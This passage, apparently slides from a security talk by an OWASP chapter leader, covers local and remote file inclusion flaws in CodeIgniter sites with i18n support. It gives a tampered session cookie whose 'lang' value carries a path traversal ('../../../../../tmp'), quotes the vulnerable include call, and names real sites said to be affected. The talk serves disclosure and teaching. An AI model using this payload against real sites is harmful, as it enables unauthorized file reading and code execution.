  • 19. Local Code Inclusion (II) • Now change cookie from – a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18 afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A% 22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22M ozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3 A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A %22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A% 22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A% 22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965b ad – To lang%22%3Bs%3A2%3A%22../../../../../tmp
  • 20. Remote Code Inclusion • Look at the code: include($package_path.'language/'.$idiom.'/'.$langfile); • You a hacker? tell me how!
  • 21. Remote Code Inclusion (II) $this->load->add_package_path() Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following: $this->load->add_package_path(APPPATH.'third_party/foo_bar/'); http://codeigniter.com/user_guide/libraries/loader.html
  • 23.
  • 24. CodeIgniter + i18n • More than 240 sites discovered: – http://www.sedoparking.com – http://bambooinvoice.org/ – http://www.haughin.com/ – http://www.rapyd.com/ – http://code-igniter.ru/ • And tons more…
  • 25. Questions? Feedback? Abbas Naderi (aka AbiusX) OWASP Chapter Leader of Iran ISSECO Member abiusx@acm.org / me@abiusx.com